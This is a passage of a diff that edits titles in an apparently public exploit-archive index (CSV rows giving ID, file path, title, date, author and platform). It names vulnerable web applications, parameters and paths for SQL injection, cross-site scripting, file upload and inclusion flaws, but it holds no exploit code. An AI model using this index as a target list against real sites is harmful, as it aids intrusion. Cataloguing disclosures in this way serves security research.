Vulnerabilities",2012-04-29,"Chokri Ben Achor",perl,webapps,0 37118,platforms/php/webapps/37118.txt,"SKYUC 3.2.1 - 'encode' Parameter Cross-Site Scripting",2012-04-27,farbodmahini,php,webapps,0 -37119,platforms/asp/webapps/37119.txt,"XM Forum - 'id' Parameter Multiple SQL Injection",2012-04-27,"Farbod Mahini",asp,webapps,0 +37119,platforms/asp/webapps/37119.txt,"XM Forum - 'id' Parameter Multiple SQL Injections",2012-04-27,"Farbod Mahini",asp,webapps,0 37120,platforms/php/webapps/37120.txt,"Uiga FanClub - 'p' Parameter SQL Injection",2012-04-27,"Farbod Mahini",php,webapps,0 37121,platforms/asp/webapps/37121.txt,"BBSXP CMS - Multiple SQL Injections",2012-04-27,"Farbod Mahini",asp,webapps,0 37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 - 'id' Parameter SQL Injection",2012-04-28,eidelweiss,php,webapps,0 @@ -35724,7 +35735,7 @@ id,file,description,date,author,platform,type,port 37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Vulnerabilities",2012-05-20,AkaStep,php,webapps,0 37226,platforms/php/webapps/37226.txt,"Concrete5 FlashUploader - Arbitrary '.SWF' File Upload",2012-05-20,AkaStep,php,webapps,0 37350,platforms/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'index.php' id Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0 -37351,platforms/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin - admin.php Multiple Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0 +37351,platforms/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'admin.php' Multiple Parameter SQL Injections",2012-06-03,KedAns-Dz,php,webapps,0 37352,platforms/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,php,webapps,0 37353,platforms/php/webapps/37353.php,"WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",php,webapps,0 37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQL Injection",2015-06-09,Pancaker,php,webapps,0 @@ -35882,7 +35893,7 @@ id,file,description,date,author,platform,type,port 37474,platforms/php/webapps/37474.txt,"CuteNews 2.0.3 - Arbitrary File Upload",2015-07-03,T0x!c,php,webapps,80 37498,platforms/php/webapps/37498.txt,"Kajona - 'getAllPassedParams()' Function Multiple Cross-Site Scripting Vulnerabilities",2012-07-11,"High-Tech Bridge SA",php,webapps,0 37476,platforms/php/webapps/37476.txt,"PHP MBB - Cross-Site Scripting / SQL Injection",2012-07-03,TheCyberNuxbie,php,webapps,0 -37479,platforms/php/webapps/37479.txt,"Classified Ads Script PHP - 'admin.php' Multiple SQL Injection",2012-07-04,snup,php,webapps,0 +37479,platforms/php/webapps/37479.txt,"Classified Ads Script PHP - 'admin.php' Multiple SQL Injections",2012-07-04,snup,php,webapps,0 37481,platforms/php/webapps/37481.txt,"WordPress Plugin SocialFit - 'msg' Parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 37482,platforms/php/webapps/37482.txt,"WordPress Plugin custom tables - 'key' Parameter Cross-Site Scripting",2012-07-03,"Sammy FORGIT",php,webapps,0 37483,platforms/php/webapps/37483.txt,"WordPress Plugin church_admin - 'id' Parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 @@ -35932,7 +35943,7 @@ id,file,description,date,author,platform,type,port 37551,platforms/php/webapps/37551.txt,"phpBB - Multiple SQL Injections",2012-07-28,HauntIT,php,webapps,0 37552,platforms/php/webapps/37552.txt,"JW Player - 'playerready' Parameter Cross-Site Scripting",2012-07-29,MustLive,php,webapps,0 37553,platforms/php/webapps/37553.txt,"eNdonesia - 'cid' Parameter SQL Injection",2012-07-29,Crim3R,php,webapps,0 -37554,platforms/php/webapps/37554.txt,"Limny - 'index.php' Multiple SQL Injection",2012-07-31,L0n3ly-H34rT,php,webapps,0 +37554,platforms/php/webapps/37554.txt,"Limny - 'index.php' Multiple SQL Injections",2012-07-31,L0n3ly-H34rT,php,webapps,0 37555,platforms/java/webapps/37555.txt,"ManageEngine Applications Manager - Multiple SQL Injections",2012-08-01,"Ibrahim El-Sayed",java,webapps,0 37556,platforms/php/webapps/37556.txt,"Distimo Monitor - Multiple Cross-Site Scripting Vulnerabilities",2012-08-01,"Benjamin Kunz Mejri",php,webapps,0 37557,platforms/java/webapps/37557.txt,"ManageEngine Applications Manager - Multiple Cross-Site Scripting / SQL Injection",2012-08-01,"Ibrahim El-Sayed",java,webapps,0 @@ -35952,8 +35963,8 @@ id,file,description,date,author,platform,type,port 37581,platforms/php/webapps/37581.txt,"Dir2web - system/src/dispatcher.php oid Parameter SQL Injection",2012-08-07,"Daniel Correa",php,webapps,0 37582,platforms/php/webapps/37582.py,"Mibew Messenger 1.6.4 - 'threadid' Parameter SQL Injection",2012-08-05,"Ucha Gobejishvili",php,webapps,0 37583,platforms/php/webapps/37583.txt,"YT-Videos Script - 'id' Parameter SQL Injection",2012-08-06,3spi0n,php,webapps,0 -37584,platforms/php/webapps/37584.txt,"TCExam 11.2.x - /admin/code/tce_edit_answer.php Multiple Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 -37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x - /admin/code/tce_edit_question.php subject_module_id Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 +37584,platforms/php/webapps/37584.txt,"TCExam 11.2.x - '/admin/code/tce_edit_answer.php' Multiple Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 +37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x - '/admin/code/tce_edit_question.php' 'subject_module_id' Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 37586,platforms/php/webapps/37586.php,"PBBoard - Authentication Bypass",2012-08-07,i-Hmx,php,webapps,0 37587,platforms/php/webapps/37587.txt,"Getsimple - 'path' Parameter Local File Inclusion",2012-08-07,PuN!Sh3r,php,webapps,0 37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,php,webapps,80 @@ -36054,7 +36065,7 @@ id,file,description,date,author,platform,type,port 37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80 37754,platforms/php/webapps/37754.txt,"WordPress Plugin Candidate Application Form 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 37948,platforms/php/webapps/37948.txt,"WordPress Plugin Slideshow - Multiple Cross-Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0 -37950,platforms/php/webapps/37950.txt,"jCore - /admin/index.php path Parameter Cross-Site Scripting",2012-10-17,"High-Tech Bridge",php,webapps,0 +37950,platforms/php/webapps/37950.txt,"jCore - '/admin/index.php' 'path' Parameter Cross-Site Scripting",2012-10-17,"High-Tech Bridge",php,webapps,0 37757,platforms/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XXE Exploit",2015-08-12,"David Bloom",multiple,webapps,0 37761,platforms/ios/webapps/37761.txt,"Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting",2015-08-12,"Taurus Omar",ios,webapps,0 37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - XML eXternal Entity Injection (XXE) on PHP FPM",2015-08-13,"Dawid Golunski",multiple,webapps,0 @@ -36125,7 +36136,7 @@ id,file,description,date,author,platform,type,port 37907,platforms/php/webapps/37907.txt,"WordPress Plugin MDC Private Message 1.0.0 - Persistent Cross-Site Scripting",2015-08-21,"Chris Kellum",php,webapps,80 37926,platforms/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0 37927,platforms/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0 -37928,platforms/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 +37928,platforms/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection / Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 37929,platforms/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass Issue",2015-08-21,"Anastasios Monachos",php,webapps,0 37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",php,webapps,0 37931,platforms/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 @@ -36187,7 +36198,7 @@ id,file,description,date,author,platform,type,port 38039,platforms/php/webapps/38039.txt,"openSIS 5.1 - 'ajax.php' Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0 38040,platforms/php/webapps/38040.txt,"ATutor 2.1 - 'tool_file' Parameter Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps,0 38041,platforms/php/webapps/38041.txt,"WordPress Theme Madebymilk - 'id' Parameter SQL Injection",2012-11-20,"Ashiyane Digital Security Team",php,webapps,0 -38042,platforms/php/webapps/38042.txt,"dotProject 2.1.x - 'index.php' Multiple Parameter SQL Injection",2012-11-21,"High-Tech Bridge",php,webapps,0 +38042,platforms/php/webapps/38042.txt,"dotProject 2.1.x - 'index.php' Multiple Parameter SQL Injections",2012-11-21,"High-Tech Bridge",php,webapps,0 38043,platforms/php/webapps/38043.txt,"dotProject 2.1.x - 'index.php' Multiple Parameter Cross-Site Scripting",2012-11-21,"High-Tech Bridge",php,webapps,0 38044,platforms/php/webapps/38044.txt,"Feng Office - Security Bypass / HTML Injection",2012-11-21,Ur0b0r0x,php,webapps,0 38045,platforms/php/webapps/38045.html,"XiVO - Cross-Site Request Forgery",2012-11-21,"Francis Provencher",php,webapps,0 @@ -36203,7 +36214,7 @@ id,file,description,date,author,platform,type,port 38062,platforms/multiple/webapps/38062.txt,"Forescout CounterACT - 'a' Parameter Open redirection",2012-11-26,"Joseph Sheridan",multiple,webapps,0 38063,platforms/php/webapps/38063.txt,"WordPress Theme Wp-ImageZoom - 'id' Parameter SQL Injection",2012-11-26,Amirh03in,php,webapps,0 38064,platforms/php/webapps/38064.txt,"WordPress Theme CStar Design - 'id' Parameter SQL Injection",2012-11-27,Amirh03in,php,webapps,0 -38068,platforms/php/webapps/38068.txt,"MantisBT 1.2.19 - Host Header Attack",2015-09-02,"Pier-Luc Maltais",php,webapps,80 +38068,platforms/php/webapps/38068.txt,"MantisBT 1.2.19 - Host Header Exploit",2015-09-02,"Pier-Luc Maltais",php,webapps,80 38071,platforms/php/webapps/38071.rb,"YesWiki 0.2 - 'squelette' Directory Traversal",2015-09-02,HaHwul,php,webapps,80 38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - Cross-Site Request Forgery / Command Execution",2015-09-02,"Phan Thanh Duy",hardware,webapps,80 38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - Cross-Site Request Forgery",2015-09-02,"High-Tech Bridge SA",php,webapps,80 @@ -36235,7 +36246,7 @@ id,file,description,date,author,platform,type,port 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0 38130,platforms/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,java,webapps,0 38131,platforms/php/webapps/38131.txt,"PHP Address Book - 'group' Parameter Cross-Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps,0 -38133,platforms/php/webapps/38133.txt,"WordPress Plugin RokBox Plugin - /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter Cross-Site Scripting",2012-12-17,MustLive,php,webapps,0 +38133,platforms/php/webapps/38133.txt,"WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf' 'abouttext' Parameter Cross-Site Scripting",2012-12-17,MustLive,php,webapps,0 38134,platforms/php/webapps/38134.txt,"Joomla! Component 'com_ztautolink' - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 38135,platforms/php/webapps/38135.txt,"Joomla! Component 'com_bit' - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 38139,platforms/php/webapps/38139.txt,"MyBB Transactions Plugin - 'transaction' Parameter SQL Injection",2012-12-18,limb0,php,webapps,0 @@ -36247,14 +36258,14 @@ id,file,description,date,author,platform,type,port 38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80 38204,platforms/php/webapps/38204.txt,"Prizm Content Connect - Arbitrary File Upload",2013-01-09,"Include Security Research",php,webapps,0 38152,platforms/php/webapps/38152.txt,"MotoCMS - admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps,0 -38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) - /webmail/x3/mail/clientconf.html acct Parameter Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",php,webapps,0 +38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) - '/webmail/x3/mail/clientconf.html' 'acct' Parameter Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",php,webapps,0 38154,platforms/php/webapps/38154.txt,"cPanel - detailbw.html Multiple Parameter Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",php,webapps,0 38155,platforms/php/webapps/38155.txt,"WHM - 'filtername' Parameter Cross-Site Scripting",2012-12-27,"Rafay Baloch",php,webapps,0 38156,platforms/php/webapps/38156.txt,"cPanel - 'dir' Parameter Cross-Site Scripting",2012-12-26,"Rafay Baloch",php,webapps,0 38157,platforms/php/webapps/38157.txt,"WordPress Plugin Xerte Online - 'save.php' Arbitrary File Upload",2013-01-02,"Sammy FORGIT",php,webapps,0 -38158,platforms/php/webapps/38158.txt,"WordPress Plugin Shopping Cart for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 -38159,platforms/php/webapps/38159.txt,"WordPress Plugin Shopping Cart for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/backup.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 -38160,platforms/php/webapps/38160.txt,"WordPress Plugin Shopping Cart for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 +38158,platforms/php/webapps/38158.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php' 'reqID' Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 +38159,platforms/php/webapps/38159.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php' 'reqID' Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 +38160,platforms/php/webapps/38160.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php' 'reqID' Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 38161,platforms/php/webapps/38161.txt,"osTicket - l.php url Parameter Arbitrary Site Redirect",2013-01-02,AkaStep,php,webapps,0 38162,platforms/php/webapps/38162.txt,"osTicket - tickets.php status Parameter Cross-Site Scripting",2013-01-02,AkaStep,php,webapps,0 38163,platforms/php/webapps/38163.txt,"WordPress Plugin Uploader - Arbitrary File Upload",2013-01-03,"Sammy FORGIT",php,webapps,0 @@ -36292,7 +36303,7 @@ id,file,description,date,author,platform,type,port 38235,platforms/jsp/webapps/38235.txt,"Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities",2013-01-22,"Christy Philip Mathew",jsp,webapps,0 38236,platforms/php/webapps/38236.txt,"gpEasy CMS - 'section' Parameter Cross-Site Scripting",2013-01-23,"High-Tech Bridge SA",php,webapps,0 38237,platforms/php/webapps/38237.txt,"WordPress Theme Chocolate WP - Multiple Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps,0 -38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injection",2013-01-25,AkaStep,php,webapps,0 +38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injections",2013-01-25,AkaStep,php,webapps,0 38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - 'load_data_for_search.php' SQL Injection",2015-09-18,jsass,php,webapps,80 38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,hardware,webapps,0 38246,platforms/php/webapps/38246.txt,"iCart Pro - 'section' Parameter SQL Injection",2013-01-25,n3tw0rk,php,webapps,0 @@ -36303,7 +36314,7 @@ id,file,description,date,author,platform,type,port 38291,platforms/php/webapps/38291.txt,"EasyITSP - 'voicemail.php' Directory Traversal",2013-02-04,"Michal Blaszczak",php,webapps,0 38292,platforms/php/webapps/38292.txt,"refbase 0.9.6 - Multiple Vulnerabilities",2015-09-23,"Mohab Ali",php,webapps,0 38294,platforms/php/webapps/38294.txt,"ezStats2 - 'style.php' Local File Inclusion",2013-02-06,L0n3ly-H34rT,php,webapps,0 -38295,platforms/php/webapps/38295.txt,"ezStats for Battlefield 3 - /ezStats2/compare.php Multiple Parameter Cross-Site Scripting",2013-02-06,L0n3ly-H34rT,php,webapps,0 +38295,platforms/php/webapps/38295.txt,"ezStats for Battlefield 3 - '/ezStats2/compare.php' Multiple Parameter Cross-Site Scripting",2013-02-06,L0n3ly-H34rT,php,webapps,0 38296,platforms/php/webapps/38296.txt,"WordPress Plugin CommentLuv - '_ajax_nonce' Parameter Cross-Site Scripting",2013-02-06,"High-Tech Bridge",php,webapps,0 38297,platforms/php/webapps/38297.txt,"WordPress Plugin Wysija Newsletters - Multiple SQL Injections",2013-02-06,"High-Tech Bridge",php,webapps,0 38300,platforms/php/webapps/38300.txt,"WordPress Plugin Audio Player - 'playerID' Parameter Cross-Site Scripting",2013-01-31,hiphop,php,webapps,0 @@ -36375,17 +36386,17 @@ id,file,description,date,author,platform,type,port 38417,platforms/php/webapps/38417.txt,"Symphony - 'sort' Parameter SQL Injection",2013-04-03,"High-Tech Bridge",php,webapps,0 38418,platforms/php/webapps/38418.txt,"FUDforum - Multiple Remote PHP Code Injection Vulnerabilities",2013-04-03,"High-Tech Bridge",php,webapps,0 38424,platforms/multiple/webapps/38424.txt,"Kallithea 0.2.9 - (came_from) HTTP Response Splitting",2015-10-08,LiquidWorm,multiple,webapps,0 -38425,platforms/php/webapps/38425.txt,"PHP Address Book - /addressbook/register/delete_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38426,platforms/php/webapps/38426.txt,"PHP Address Book - /addressbook/register/edit_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38427,platforms/php/webapps/38427.txt,"PHP Address Book - /addressbook/register/edit_user_save.php Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38428,platforms/php/webapps/38428.txt,"PHP Address Book - /addressbook/register/linktick.php site Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38429,platforms/php/webapps/38429.txt,"PHP Address Book - /addressbook/register/reset_password.php Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38430,platforms/php/webapps/38430.txt,"PHP Address Book - /addressbook/register/reset_password_save.php Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38431,platforms/php/webapps/38431.txt,"PHP Address Book - /addressbook/register/router.php BasicLogin Cookie Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38432,platforms/php/webapps/38432.txt,"PHP Address Book - /addressbook/register/traffic.php var Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38433,platforms/php/webapps/38433.txt,"PHP Address Book - /addressbook/register/user_add_save.php email Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38434,platforms/php/webapps/38434.txt,"PHP Address Book - /addressbook/register/checklogin.php 'Username' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38435,platforms/php/webapps/38435.txt,"PHP Address Book - /addressbook/register/admin_index.php q Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38425,platforms/php/webapps/38425.txt,"PHP Address Book - '/addressbook/register/delete_user.php' 'id' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38426,platforms/php/webapps/38426.txt,"PHP Address Book - '/addressbook/register/edit_user.php' 'id' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38427,platforms/php/webapps/38427.txt,"PHP Address Book - '/addressbook/register/edit_user_save.php' Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38428,platforms/php/webapps/38428.txt,"PHP Address Book - '/addressbook/register/linktick.php' 'site' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38429,platforms/php/webapps/38429.txt,"PHP Address Book - '/addressbook/register/reset_password.php' Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38430,platforms/php/webapps/38430.txt,"PHP Address Book - '/addressbook/register/reset_password_save.php' Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38431,platforms/php/webapps/38431.txt,"PHP Address Book - '/addressbook/register/router.php' 'BasicLogin' Cookie Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38432,platforms/php/webapps/38432.txt,"PHP Address Book - '/addressbook/register/traffic.php' 'var' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38433,platforms/php/webapps/38433.txt,"PHP Address Book - '/addressbook/register/user_add_save.php' 'email' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38434,platforms/php/webapps/38434.txt,"PHP Address Book - '/addressbook/register/checklogin.php' 'Username' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38435,platforms/php/webapps/38435.txt,"PHP Address Book - '/addressbook/register/admin_index.php' 'q' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38436,platforms/php/webapps/38436.txt,"Zimbra - 'aspell.php' Cross-Site Scripting",2013-04-05,"Michael Scherer",php,webapps,0 38438,platforms/php/webapps/38438.txt,"EasyPHP - 'index.php' Authentication Bypass / Remote PHP Code Injection",2013-04-09,KedAns-Dz,php,webapps,0 38439,platforms/php/webapps/38439.txt,"WordPress Plugin Traffic Analyzer - 'aoid' Parameter Cross-Site Scripting",2013-04-09,Beni_Vanda,php,webapps,0 @@ -36403,8 +36414,8 @@ id,file,description,date,author,platform,type,port 38458,platforms/php/webapps/38458.txt,"WordPress Plugin Spider Video Player - 'theme' Parameter SQL Injection",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0 38459,platforms/php/webapps/38459.txt,"Request Tracker - 'ShowPending' Parameter SQL Injection",2013-04-11,cheki,php,webapps,0 38460,platforms/jsp/webapps/38460.txt,"jPlayer - 'Jplayer.swf' Script Cross-Site Scripting",2013-03-29,"Malte Batram",jsp,webapps,0 -38461,platforms/java/webapps/38461.txt,"Hero Framework - /users/login 'Username' Parameter Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps,0 -38462,platforms/java/webapps/38462.txt,"Hero Framework - /users/forgot_password error Parameter Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps,0 +38461,platforms/java/webapps/38461.txt,"Hero Framework - '/users/login' 'Username' Parameter Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps,0 +38462,platforms/java/webapps/38462.txt,"Hero Framework - '/users/forgot_password' 'error' Parameter Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps,0 38463,platforms/multiple/webapps/38463.txt,"Aibolit - Information Disclosure",2013-04-13,MustLive,multiple,webapps,0 38470,platforms/hardware/webapps/38470.txt,"netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0 38471,platforms/hardware/webapps/38471.txt,"PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0 @@ -36418,10 +36429,10 @@ id,file,description,date,author,platform,type,port 38491,platforms/php/webapps/38491.php,"SMF - 'index.php' HTML Injection / Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0 38494,platforms/php/webapps/38494.txt,"WordPress Plugin WP Super Cache - Remote PHP Code Execution",2013-04-24,anonymous,php,webapps,0 38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0 -38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injection",2015-10-19,LiquidWorm,php,webapps,0 +38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injections",2015-10-19,LiquidWorm,php,webapps,0 38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script - Spoofing",2013-04-27,"Jason Whelan",php,webapps,0 -38506,platforms/php/webapps/38506.txt,"NetApp OnCommand System Manager - /zapiServlet CIFS Configuration Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0 -38507,platforms/php/webapps/38507.txt,"NetApp OnCommand System Manager - /zapiServlet User Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0 +38506,platforms/php/webapps/38506.txt,"NetApp OnCommand System Manager - '/zapiServlet' CIFS Configuration Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0 +38507,platforms/php/webapps/38507.txt,"NetApp OnCommand System Manager - '/zapiServlet' User Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0 38508,platforms/php/webapps/38508.txt,"MyBB Game Section Plugin - 'games.php' Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,anonymous,php,webapps,0 38509,platforms/php/webapps/38509.txt,"Securimage - 'example_form.php' Cross-Site Scripting",2013-05-10,"Gjoko Krstic",php,webapps,0 38510,platforms/php/webapps/38510.txt,"WordPress Plugin Securimage-WP - 'siwp_test.php' Cross-Site Scripting",2013-05-11,"Gjoko Krstic",php,webapps,0 @@ -36514,7 +36525,7 @@ id,file,description,date,author,platform,type,port 38677,platforms/php/webapps/38677.txt,"vBulletin 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 38678,platforms/php/webapps/38678.txt,"WordPress Plugin WP Fastest Cache 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 38679,platforms/php/webapps/38679.txt,"Alienvault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 -38682,platforms/php/webapps/38682.txt,"Jahia xCM - /engines/manager.jsp site Parameter Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps,0 +38682,platforms/php/webapps/38682.txt,"Jahia xCM - '/engines/manager.jsp' 'site' Parameter Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps,0 38683,platforms/php/webapps/38683.txt,"Jahia xCM - '/administration/' Multiple Parameter Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps,0 38688,platforms/php/webapps/38688.txt,"b374k Web Shell 3.2.3 / 2.8 - Cross-Site Request Forgery / Command Injection",2015-11-13,hyp3rlinx,php,webapps,0 38689,platforms/php/webapps/38689.txt,"Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure",2013-08-01,"Fara Rustein",php,webapps,0 @@ -36526,7 +36537,7 @@ id,file,description,date,author,platform,type,port 38698,platforms/php/webapps/38698.html,"CF Image Host 1.65 - Cross-Site Request Forgery",2015-11-16,hyp3rlinx,php,webapps,0 38699,platforms/php/webapps/38699.txt,"CF Image Host 1.65 - PHP Command Injection",2015-11-16,hyp3rlinx,php,webapps,0 38706,platforms/multiple/webapps/38706.txt,"VideoLAN VLC Media Player Web Interface 2.2.1 - Metadata Title Cross-Site Scripting",2015-11-16,"Andrea Sindoni",multiple,webapps,0 -38707,platforms/hardware/webapps/38707.txt,"D-Link DIR-816L (Wireless Router) - Cross-Site Request Forgery",2015-11-16,"Bhadresh Patel",hardware,webapps,0 +38707,platforms/hardware/webapps/38707.txt,"D-Link DIR-816L Wireless Router - Cross-Site Request Forgery",2015-11-16,"Bhadresh Patel",hardware,webapps,0 38709,platforms/php/webapps/38709.txt,"MCImageManager - Multiple Vulnerabilities",2013-07-16,MustLive,php,webapps,0 38712,platforms/php/webapps/38712.txt,"Bo-Blog 2.1.1 - Cross-Site Scripting / SQL Injection",2013-08-20,"Ashiyane Digital Security Team",php,webapps,0 38727,platforms/php/webapps/38727.txt,"AlegroCart 1.2.8 - Multiple SQL Injections",2015-11-16,"Curesec Research 